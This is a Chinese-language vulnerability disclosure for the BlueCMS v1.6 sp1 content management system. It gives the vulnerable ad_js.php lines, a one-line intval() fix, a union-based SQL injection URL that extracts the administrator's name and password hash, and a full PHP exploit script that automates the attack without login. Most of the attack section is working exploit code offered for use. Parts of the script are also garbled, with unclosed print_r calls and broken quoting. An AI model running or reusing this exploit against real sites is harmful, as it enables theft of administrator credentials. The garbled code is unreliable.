基于当今最流行的开源组合PHP+MYSQL开发
每个分类均可单独设置Title、Keywords、Description,方便SEO
强力模板引擎,显示风格自由定义,随心所欲
多功能模块插件,操作简单方便
智能缓存技术,提高网站性能
多属性模型自定义,栏目功能强大
缺陷文件:ad_js.php
漏洞成因:
12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //根目录下其他文件都做了很好的过滤,对数字型变量几乎都用了intval()做限制,唯独漏了这个文件,居然只是用了trim()去除头尾空格。。
19: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id); //直接代入查询。。汗。
修补方案:
$ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';
漏洞Poc:
http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1
右键查看源代码得到返回数据。
漏洞Exp:
<?php
print_r('
------------------------------------------
BlueCMS v1.6 sp1 "ad_js.php" SQL Injection
get admin_user pwd-hash without login
by CnCxzSec衰仔 http://hi.baidu.com/cncxz
------------------------------------------
');
if($argc<3){
print_r('
------------------------------------------
usage:php '.$argv[0].' host path
host: without "http://"
path: path to bluecms
example:
php '.$argv[0].' localhost /
------------------------------------------
');
die;
}
$host=$argv[1];
$path=$argv[2];
$inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1";
print_r("
$fp=fsockopen($host, 80, $errno, $errstr, 30);
if(!$fp) echo "$errstr($errno)<br />\n";
else{
$head ="GET $path"."$inj HTTP/1.1\r\n";
$head .="Host:".$host."\r\n";
$head .="Connection: Close\r\n\r\n";
$result='';
fputs($fp,$head);
while(!feof($fp)){
$result .=fgets($fp,4096);
}
if (!eregi("document",$result)){
$temp=explode("FROM ",$result);
if(isset($temp[1])){$temp2=explode("ad",$temp[1]);}
if($temp2[0])
$prefix=$temp2[0];
print_r('
$inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20".$prefix."admin%20where%20admin_id=1";
$fp=fsockopen($host, 80, $errno, $errstr, 30);
if(!$fp) echo "$errstr($errno)<br />\n";
else{
$head ="GET $path"."$inj HTTP/1.1\r\n";
$head .="Host:".$host."\r\n";
$head .="Connection: Close\r\n\r\n";
$result='';
fputs($fp,$head);
while(!feof($fp)){
$result .=fgets($fp,4096);
}
fclose($fp);
$rs1=strstr($result,"\"");
$name=substr($rs1,1,strpos($rs1,"|")-1);
$pass=substr($rs1,strpos($rs1,"|")+5,32);
print_r('
print_r('
username:'.$name);
print_r('
pwd-hash:'.$pass);
}
}
else{
$rs1=strstr($result,"\"");
$name=substr($rs1,1,strpos($rs1,"|")-1);
$pass=substr($rs1,strpos($rs1,"|")+5,32);
print_r('
print_r('
username:'.$name);
print_r('
pwd-hash:'.$pass);
}
}
?>